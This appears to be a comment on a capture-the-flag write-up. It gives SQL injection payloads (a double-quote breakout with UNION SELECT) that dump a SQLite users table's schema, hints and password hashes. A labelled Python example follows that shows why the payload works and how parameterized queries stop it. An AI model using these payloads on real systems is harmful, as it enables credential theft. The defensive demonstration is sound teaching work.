Tags: cracking sqlite sqlinjection hashcat
Rating: 4.5
Nice writeup! You can actually avoid having to look up the values one char at a time by using SQL injection with a double-quote in the search page:
[show the columns in the users table]
request=admin" union select (SELECT sql FROM sqlite_master WHERE name='users'), 'me' --
Outputs: CREATE TABLE users ( username text primary key not null, password_hash text not null, hint text not null, bio text not null)
[show all the hints]
request=admin" union SELECT username,hint from users --
[show all the hashes]
admin" union SELECT username,password_hash from users --
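
Added example, not part of the comment above or the original writeup: a defender's view of why the double-quote payload works and how a bound parameter stops it. The users schema and the payload are taken from the page; the shape of the search query, the function names, and the sample rows with placeholder hashes are assumptions made for illustration.

```python
import sqlite3

# Schema is the one shown on the page; rows and hash values are constructed.
SCHEMA = ("CREATE TABLE users ( username text primary key not null, "
          "password_hash text not null, hint text not null, bio text not null)")
ROWS = [("admin", "HASH_ADMIN_PLACEHOLDER", "hint-a", "site admin"),
        ("bob", "HASH_BOB_PLACEHOLDER", "hint-b", "regular user")]
# Payload quoted from the page (the value of the request parameter).
PAYLOAD = 'admin" union SELECT username,password_hash from users --'


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(SCHEMA)
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", ROWS)
    return conn


def search_vulnerable(conn, request):
    # Assumed handler: input is concatenated between double quotes. SQLite
    # accepts a double-quoted token as a string literal when it matches no
    # column, so the query works until the input carries its own quote.
    sql = 'SELECT username, bio FROM users WHERE username = "' + request + '"'
    return conn.execute(sql).fetchall()


def search_parameterized(conn, request):
    # The value is bound, never parsed as SQL, so quotes in it are just data.
    sql = "SELECT username, bio FROM users WHERE username = ?"
    return conn.execute(sql, (request,)).fetchall()


def leaks_hashes(search_fn):
    # Regression check: does the page's payload surface any password_hash?
    conn = make_db()
    hashes = {row[1] for row in ROWS}
    returned = {value for row in search_fn(conn, PAYLOAD) for value in row}
    return bool(hashes & returned)


if __name__ == "__main__":
    print("vulnerable leaks hashes:   ", leaks_hashes(search_vulnerable))
    print("parameterized leaks hashes:", leaks_hashes(search_parameterized))
```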